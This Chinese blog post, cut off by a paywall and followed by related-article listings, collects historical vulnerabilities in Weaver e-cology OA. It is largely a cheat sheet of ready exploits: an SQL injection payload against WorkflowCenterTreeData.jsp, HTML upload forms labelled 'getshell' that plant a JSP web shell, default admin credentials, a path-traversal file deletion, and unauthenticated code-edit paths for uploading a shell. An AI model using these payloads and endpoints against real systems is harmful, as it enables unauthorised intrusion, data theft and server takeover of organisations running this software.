Web安全-泛微相关系统-历史漏洞

最新推荐文章于 2024-08-18 10:29:23 发布
最新推荐文章于 2024-08-18 10:29:23 发布
阅读量4.8k 收藏 4
点赞数
文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjsz/article/details/107056807
版权
本文详细列举了泛微e-cology OA系统自2019年以来遭遇的各种安全漏洞,包括数据库配置信息泄漏、SQL注入、远程代码执行等重大风险。这些漏洞影响了多个版本,如7.0、8.0、8.1等,并提供了攻击payload示例。此外,还提到了利用这些漏洞可能导致的敏感信息泄露、系统权限滥用、文件上传漏洞和XSS攻击等问题。
摘要由CSDN通过智能技术生成

2019年
泛微e-cology OA数据库配置信息泄漏
包括不限于8.0、9.0版本
/mobile/dbconfigreader.jsp

2019年
泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)


2019年
泛微e-cology OA系统远程代码执行
0x02 影响范围
包括但不限于7.0,8.0,8.1
/weaver/bsh.servlet.BshServlet/


CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
受影响版本
泛微e-cology OA系统 JSP版本
Payload:
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

 

 

缺陷编号:wooyun-2015-0132247
漏洞标题:泛微OA办公系统一处通用SQL注入(需要登陆)
包含6.0及7.0版本
/workflow/FormBillBrowser.jsp
参数:formName 拼接sql未过滤


wooyun-2015-0137850
泛微OA系统通用任意文件上传getshell(附官方案例)
影响6.0、7.0、7.100、8.0(需要登录)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1)存在文件上传绕过(更改后缀:1.jsp.,1.jspx ; 0x00截断)
(2)上传路径可控
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


wooyun-2015-0140003
泛微OA通用系统三处SQL注入打包(官网可复现无需登录)
(1)/mobile/plugin/loadWfGraph.jsp requestid
(2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid
(3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id

 


缺陷编号:wooyun-2016-0178866
漏洞标题:泛微OA某接口无需登录可执行任意SQL语句(附脚本)
/ws /ws/query?wsdl XML注入


缺陷编号:wooyun-2016-0169872
漏洞标题:泛微OA某处缺陷可遍历和操作系统文件
plugin\ewe\jsp\config.jsp
sUsername = "sysadmin";
sPassword = "weaversoft"
(1)/plugin/ewe/admin/default.jsp 新建文件1.txt
(2)越权删除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../


wooyun-2015-0155705
泛微OA未授权可导致GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
上传马路径:/sysinterface/extpage/ccccc.jsp
路径可控:
/sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
上传马路径:http://url/ccccc.jsp


缺陷编号:wooyun-2015-0141834
漏洞标题:雨润集团泛微OA系统表单任意上传拿shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
上传马路径:http://url/shell.jsp


缺陷编号:wooyun-2015-0138725
漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)
/mobile/plugin/PreDownload.jsp url sql拼接未过滤


缺陷编号:wooyun-2015-0132258
漏洞标题:泛微OA系统存在SQL注入漏

最低0.47元/天 解锁文章
csjsz
关注
【1day】复现泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc(QVD-2023-15672)
记录并分享学习安全的知识点..
07-12 1010
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc存在SQL注入漏洞
泛微E-Mobile 6.0存在命令执行漏洞
xiaokp7的博客
07-30 1634
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 5735
泛微最新漏洞汇总
泛微云桥前台文件上传漏洞-202408
最新发布
网络安全。
08-18 1070
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
泛微最新漏洞汇总----实时更新!!!_泛微漏洞,2024年最新网络安全程序员必会
erthre的博客
04-16 1969
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“泛微 e-cology 9.0 OA”
Swfupload.swf 跨站脚本——漏洞复现
W小哥
12-18 4588
一、swfupload.swf简介 SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。 此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。 二、漏洞复现 payload如下 http://XXX/images/swfupload/swfu
泛微E-Office前台文件上传漏洞
失心少年
06-20 907
我们在第108行调用doc2text(),然后追溯到doc2txt()参数$FILE_PATH的源,连接附件目录(C:\eoffice9\webroot\ATTACHMENT) 的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获得完整的文件路径。天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
做自己喜欢的事,并将其发挥到极致!
11-29 5337
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台。 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 泛微e-office V9.0 0x03 漏洞复现 访问界面如下 ...
CVE-2023-2766:泛微E-Office信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-14 1722
Weaver E-Office 9.5版本存在configfile存在信息泄露。攻击者利用该漏洞可以访问文件或目录。
jquery上传插件uploadify+php完美实现强大的文件上传功能实例+程序
01-18
jquery上传插件uploadify+php完美实现强大的文件上传功能实例+程序_【PHP】.rar
Weaver E-Office v9.5 文件上传漏洞(CVE-2023-2648)
Flag少侠的博客
06-19 8028
CVE-2023-2648 是一个在 Weaver E-Office 9.5 版本中发现的严重漏洞。此漏洞位于文件中,通过操控Filedata参数,可以进行不受限制的文件上传。这一漏洞允许攻击者上传可能包含危险类型的文件,并在应用程序环境中执行。该漏洞可以通过远程发起攻击,且已被公开披露,构成了严重的安全风险。此漏洞被分类为 CWE-434:不受限制的危险类型文件上传。根据 CVSS v3.1 评分,此漏洞的基本评分为 9.8,表明其严重性极高。
分享8:文件操作(java模拟上传下载)
cc_百川
11-20 781
需求: 使用java通过下载连接下载数据并上传到其他服务器。 下载: 第一:下载网络文件: /** * 下载网络文件 * @throws MalformedURLException */ public void downloadNet(String neturl, String outurl) throws MalformedURLException { ...
js 文件下载
qq_39852145的博客
12-25 1281
静态文件下载 当我们下载的文件是不改变、唯一的文件而不是临时生成的文件,我们可以将该文件部署到Nginx服务器上,然后得到它的url。最后根据a标签的download属性即可实现。 &lt;!-- 点击图片,下载图片 --&gt; &lt;a href="/images/logo.png" download="/images/logo.png"&gt; &lt;img src="/images/...
泛微 e-cology SQL注入漏洞复现
07-12 2018
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
Web安全漏洞原理——SQL注入
changyu233的博客
04-17 3370
Web安全漏洞原理——SQL注入 SQL注入 原理 ​ 由于程序员对插入SQL语句的用户输入参数检查不严格,导致的恶意SQL命令被插入语句并执行。 ​ 例如: ​ 原始查询语句为 select * from user where id=$value ​ $value为用户输入变量,由于没有过滤,在用户输入 1 and 1=2时 ​ 查询语句变为 select * from user where id=1 and 1=2,返回永假页面。 SQL数据库重要信息 MySQL数据库 默认数据库: ​ i
【高危】泛微 e-cology9 存在任意用户登录漏洞
murphysec的博客
06-07 3593
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。将组件 e-cology9 升级至 10.57.2 及以上版本。
漏洞复现】泛微 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 2150
漏洞复现】泛微 e-cology 前台SQL注入漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值